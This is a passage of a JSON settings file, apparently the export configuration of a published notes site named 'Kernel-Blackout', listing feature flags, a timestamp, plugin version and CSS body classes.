site","placeholder":""}},"linkPreview":{"featureId":"link-preview","enabled":true,"unavailable":false,"alwaysEnabled":false,"hideSettingsButton":true}},"modifiedTime":1770171626947,"siteName":"Kernel-Blackout","vaultName":"Kernel-Blackout","exportRoot":"","baseURL":"","pluginVersion":"1.9.2","themeName":"","bodyClasses":"publish css-settings-manager styled-scrollbars show-inline-title show-ribbon is-focused","hasFavicon":false}